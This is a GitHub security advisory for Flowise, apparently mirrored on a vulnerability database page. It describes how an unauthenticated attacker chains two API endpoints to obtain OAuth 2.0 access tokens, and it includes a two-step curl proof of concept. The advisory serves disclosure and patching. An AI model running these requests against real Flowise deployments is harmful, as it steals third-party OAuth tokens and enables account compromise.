GHSA-6F7G-V4PP-R667

Vulnerability from github – Published: 2026-04-16 21:52 – Updated: 2026-04-16 21:52
VLAI?
Summary
Flowise: Unauthenticated OAuth 2.0 Access Token Disclosure via Public Chatflow in Flowise
Details

Summary

Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow.

By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication.

Details

Flowise is designed to allow public chatflows to be accessed by unauthenticated end users via public URLs or embedded widgets. As a result, chatflowId values are intentionally exposed to unauthenticated clients and must not be treated as secrets.

However, the endpoint GET /api/v1/public-chatbotConfig/<chatflowId> returns internal flowData without authentication. The returned flowData includes workflow node definitions containing OAuth credential identifiers (credential field).

Separately, the endpoint POST /api/v1/oauth2-credential/refresh/<credentialId> allows OAuth. 2.0 tokens to be refreshed without authentication or authorization checks.

Because credential identifiers can be obtained from the unauthenticated public chatflow configuration endpoint, these two behaviors can be combined to allow unauthenticated OAuth 2.0 access token disclosure.

PoC

Prerequisites - Self-hosted Flowise instance - A public chatflow configured with an OAuth 2.0 credential (e.g., Gmail OAuth2)

Step 1: Obtain chatflowId

The chatflowId is exposed to unauthenticated users via public chatflow URLs, embedded widgets, or browser network requests when accessing a public chatflow.

Example: d37b9812-72c1-4c64-b152-665f307f755e

Step 2: Retrieve internal flowData without authentication

curl -s \
  http://localhost:3000/api/v1/public-chatbotConfig/d37b9812-72c1-4c64-b152-665f307f755e

The response includes flowData containing an OAuth credential identifier, for example:

"credential": "6efe0e20-ba6f-4fbb-9960-658feffa0542"

Step 3: Refresh OAuth 2.0 token without authentication

curl -X POST \
  http://localhost:3000/api/v1/oauth2-credential/refresh/6efe0e20-ba6f-4fbb-9960-658feffa0542

The response returns valid OAuth 2.0 access token data, including an access_token.

Impact

An unauthenticated attacker can obtain OAuth 2.0 access tokens for third-party services configured in Flowise, potentially leading to unauthorized data access, API abuse, or account compromise.

This vulnerability affects self-hosted deployments because public chatflows are commonly exposed to the internet and require unauthenticated access by design. Treating chatflowId as a secret does not mitigate the issue.

Severity ?
7.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:52:46Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nFlowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow.\n\nBy accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication.\n\n### Details\nFlowise is designed to allow public chatflows to be accessed by unauthenticated end users via public URLs or embedded widgets. As a result, `chatflowId` values are intentionally exposed to unauthenticated clients and must not be treated as secrets.\n\nHowever, the endpoint `GET /api/v1/public-chatbotConfig/\u003cchatflowId\u003e` returns internal `flowData` without authentication. The returned `flowData` includes workflow node definitions containing OAuth credential identifiers (`credential` field).\n\nSeparately, the endpoint `POST /api/v1/oauth2-credential/refresh/\u003ccredentialId\u003e` allows OAuth. 2.0 tokens to be refreshed without authentication or authorization checks.\n\nBecause credential identifiers can be obtained from the unauthenticated public chatflow configuration endpoint, these two behaviors can be combined to allow unauthenticated OAuth 2.0 access token disclosure.\n\n### PoC\n**Prerequisites**\n- Self-hosted Flowise instance\n- A public chatflow configured with an OAuth 2.0 credential (e.g., Gmail OAuth2)\n\n#### Step 1: Obtain `chatflowId`\nThe `chatflowId` is exposed to unauthenticated users via public chatflow URLs, embedded widgets, or browser network requests when accessing a public chatflow.\n\nExample: `d37b9812-72c1-4c64-b152-665f307f755e`\n\n#### Step 2: Retrieve internal `flowData` without authentication\n\n```bash\ncurl -s \\\n  http://localhost:3000/api/v1/public-chatbotConfig/d37b9812-72c1-4c64-b152-665f307f755e\n```\n\nThe response includes flowData containing an OAuth credential identifier, for example:\n\n```\n\"credential\": \"6efe0e20-ba6f-4fbb-9960-658feffa0542\"\n```\n\n#### Step 3: Refresh OAuth 2.0 token without authentication\n\n```bash\ncurl -X POST \\\n  http://localhost:3000/api/v1/oauth2-credential/refresh/6efe0e20-ba6f-4fbb-9960-658feffa0542\n```\n\nThe response returns valid OAuth 2.0 access token data, including an `access_token`.\n\n### Impact\nAn unauthenticated attacker can obtain OAuth 2.0 access tokens for third-party services configured in Flowise, potentially leading to unauthorized data access, API abuse, or account compromise.\n\nThis vulnerability affects self-hosted deployments because public chatflows are commonly exposed to the internet and require unauthenticated access by design. Treating `chatflowId` as a secret does not mitigate the issue.",
  "id": "GHSA-6f7g-v4pp-r667",
  "modified": "2026-04-16T21:52:46Z",
  "published": "2026-04-16T21:52:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Flowise: Unauthenticated OAuth 2.0 Access Token Disclosure via Public Chatflow in Flowise"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.